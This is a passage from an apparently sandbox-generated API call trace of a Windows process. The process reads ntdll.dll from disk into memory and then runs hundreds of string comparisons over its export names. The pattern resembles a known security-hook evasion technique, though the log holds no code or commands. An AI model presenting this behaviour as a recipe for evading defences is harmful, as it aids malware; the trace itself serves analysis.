nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0101.829] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0101.830] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0101.830] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0101.830] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0101.830] GetProcessHeap () returned 0x4f0000 [0101.830] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1bba48) returned 0x40b8040 [0101.836] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0101.836] ReadFile (in: hFile=0x140, lpBuffer=0x40b8040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40b8040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0102.129] CloseHandle (hObject=0x140) returned 1 [0102.129] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0102.129] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0102.129] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0102.129] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0102.129] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0102.129] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0102.129] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0102.129] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0102.129] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0102.129] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0102.130] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0102.130] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0102.130] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0102.130] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0102.130] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0102.130] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0102.130] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0102.130] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0102.130] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0102.130] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0102.130] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0102.130] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0102.130] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0102.130] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0102.130] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0102.130] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0102.130] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0102.130] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0102.130] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0102.130] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0102.130] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0102.130] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0102.130] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0102.130] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0102.130] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0102.130] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0102.130] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0102.130] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0102.130] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0102.130] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0102.130] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0102.131] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0102.131] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0102.131] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0102.131] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0102.131] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0102.131] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0102.131] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0102.131] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0102.131] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0102.131] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0102.131] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0102.131] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0102.131] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0102.131] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0102.131] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0102.131] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0102.131] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0102.131] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0102.131] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0102.131] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0102.131] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0102.131] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0102.131] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0102.131] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0102.131] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0102.131] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0102.131] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0102.131] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0102.131] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0102.131] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0102.131] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0102.131] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0102.131] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0102.131] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0102.131] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0102.132] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0102.132] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0102.132] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0102.132] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0102.132] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0102.132] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0102.132] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0102.132] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0102.132] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0102.132] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0102.132] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0102.132] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0102.132] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0102.132] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0102.132] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0102.132] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0102.132] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0102.132] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0102.132] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0102.132] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0102.132] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0102.132] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0102.132] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0102.132] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0102.132] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0102.132] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0102.132] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0102.132] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0102.132] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0102.132] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0102.132] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0102.132] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0102.132] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0102.132] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0102.132] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0102.132] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0102.132] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0102.133] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0102.133] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0102.133] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0102.133] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0102.133] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0102.133] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0102.133] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0102.133] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0102.133] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0102.133] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0102.133] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0102.133] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0102.133] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0102.133] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0102.133] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0102.133] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0102.133] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0102.133] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0102.133] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0102.133] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0102.133] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0102.133] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0102.133] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0102.133] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0102.133] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0102.133] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0102.133] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0102.133] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0102.133] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0102.133] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0102.133] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0102.133] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0102.133] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0102.133] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0102.133] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0102.133] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0102.133] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0102.134] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0102.134] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0102.134] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0102.134] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0102.134] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0102.134] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0102.134] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0102.134] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0102.134] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0102.134] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0102.134] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0102.134] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0102.134] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0102.134] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0102.134] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0102.134] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0102.134] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0102.134] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0102.134] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0102.134] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0102.134] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0102.134] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0102.134] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0102.134] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0102.134] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0102.134] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0102.134] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0102.134] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0102.134] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0102.134] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0102.134] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0102.134] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0102.134] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0102.134] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0102.134] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0102.134] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0102.134] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0102.134] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0102.135] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0102.135] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0102.135] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0102.135] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0102.135] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0102.135] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0102.135] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0102.135] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0102.135] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0102.135] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0102.135] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0102.135] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0102.135] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0102.135] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0102.135] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0102.135] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0102.135] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0102.135] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0102.135] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0102.135] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0102.135] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0102.135] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0102.135] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0102.136] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0102.136] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0102.136] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0102.136] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0102.136] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0102.136] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0102.136] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0102.136] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0102.136] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0102.136] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0102.136] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0102.136] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0102.136] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0102.136] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0102.136] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0102.136] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0102.136] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0102.136] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0102.136] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0102.136] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0102.136] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0102.136] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0102.136] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0102.136] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0102.136] 